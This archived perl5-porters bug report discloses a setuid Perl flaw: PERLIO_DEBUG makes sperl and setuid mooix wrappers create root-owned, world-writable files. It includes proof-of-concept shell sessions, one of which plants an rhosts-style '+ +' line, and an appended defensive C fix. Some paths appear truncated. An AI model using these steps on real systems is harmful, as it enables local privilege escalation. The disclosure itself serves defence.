perl.perl5.porters | Postings from January 2005

[perl #33990] setuid perl security issues

January 30, 2005 12:50
# New Ticket Created by  "KF (Lists)" 
# Please include the string:  [perl #33990]
# in the subject line of all future correspondence about this issue. 
# <URL: >

If set to the name of a file or device then certain operations of PerlIO
sub-system will be logged to that file (opened as append). Typical uses
are UNIX:

PerlIO_debug(const char *fmt, ...)
{
    /* ... */
    if (!dbg) {
        /* log path is taken straight from the environment */
        char *s = PerlEnv_getenv("PERLIO_DEBUG");
        if (s && *s)
            dbg = PerlLIO_open3(s, O_WRONLY | O_CREAT | O_APPEND, 0666);
        else
            dbg = -1;
    }
    /* ... */

If $ENV{'PERLIO_DEBUG'} is not set PerlIO_debug() is a no-op.

else you can do the following either via sperl or via sperl: 

kfinisterre@jdam:~$ ls -al /usr/bin/sperl5.8.4
-rwsr-xr-x  1 root root 63808 2004-12-11 18:32 /usr/bin/sperl5.8.4
kfinisterre@jdam:~$ export PERLIO_DEBUG=/tmp/aaa
kfinisterre@jdam:~$ umask 001
kfinisterre@jdam:~$ /usr/bin/sperl5.8.4
sperl needs fd script
You should not call sperl directly; do you need to change a #! line
from sperl to perl?
kfinisterre@jdam:~$ ls -al /tmp/aaa
-rw-rw-rw-  1 root kfinisterre 1403 2005-01-30 02:34 /tmp/aaa

setuid wrapper:
kfinisterre@jdam:/tmp$ ls -al /usr/sbin/mooix-pty-helper /usr/sbin/mooregister /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2872 2003-11-20 15:28 /usr/sbin/mooix-pty-helperc
-rwsr-xr-x  1 root root 2832 2003-11-20 15:28 /usr/sbin/moopasswd
-rwsr-xr-x  1 root root 2836 2003-11-20 15:28 /usr/sbin/mooregister

These are all setuid programs that invoke perl scripts.


kfinisterre@jdam:/tmp$ umask 001
kfinisterre@jdam:/tmp$ export PERLIO_DEBUG=/tmp/oops2
kfinisterre@jdam:/tmp$ /usr/sbin/mooix-pty-helper
need a session dir at /usr/share/mooix/ line 22,
<CONFIG> line 98.
kfinisterre@jdam:/tmp$ ls -al /tmp/oops2
-rw-rw-rw-  1 root kfinisterre 30285 2005-01-30 02:23 /tmp/oops2

kfinisterre@jdam:/tmp$ tail /tmp/oops2 -n 3
/usr/share/mooix/ fd 0 refcnt=0
/usr/share/mooix/ fd 1 refcnt=0
/usr/share/mooix/ fd 2 refcnt=0

kfinisterre@jdam:/tmp$ echo + + > /tmp/oops2

kfinisterre@jdam:~$ ls -al /etc/
ls: /etc/ No such file or directory

gonna try to write an exploit without trashing my box. hehe. fun time.
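
An added example, not part of the original post and not Perl's own code: one way a setuid-aware runtime can guard the debug-log open shown in the report, by ignoring the environment-supplied path when real and effective IDs differ and by creating the file owner-only without following a symlink. The names ids_are_elevated and open_debug_log are hypothetical.

```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef O_NOFOLLOW
#define O_NOFOLLOW 0 /* fallback for platforms without it */
#endif

/* Hypothetical helper: nonzero when the process holds IDs its invoker does
 * not, i.e. a setuid/setgid context where the environment is untrusted. */
static int ids_are_elevated(uid_t ruid, uid_t euid, gid_t rgid, gid_t egid)
{
    return ruid != euid || rgid != egid;
}

/* Hypothetical guarded open for an environment-named debug log.
 * Returns a file descriptor, or -1 when logging must stay disabled. */
static int open_debug_log(const char *path, uid_t ruid, uid_t euid,
                          gid_t rgid, gid_t egid)
{
    if (path == NULL || *path == '\0')
        return -1;                      /* variable unset: no-op */
    if (ids_are_elevated(ruid, euid, rgid, egid))
        return -1;                      /* never honour it when privileged */
    /* 0600 cannot be widened by the caller's umask; O_NOFOLLOW refuses a
     * symlink planted at the final path component. */
    return open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
}

int main(void)
{
    int fd = open_debug_log(getenv("PERLIO_DEBUG"),
                            getuid(), geteuid(), getgid(), getegid());
    if (fd < 0) {
        puts("debug logging disabled");
        return 0;
    }
    dprintf(fd, "debug log opened by uid %ld\n", (long)getuid());
    close(fd);
    return 0;
}
```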
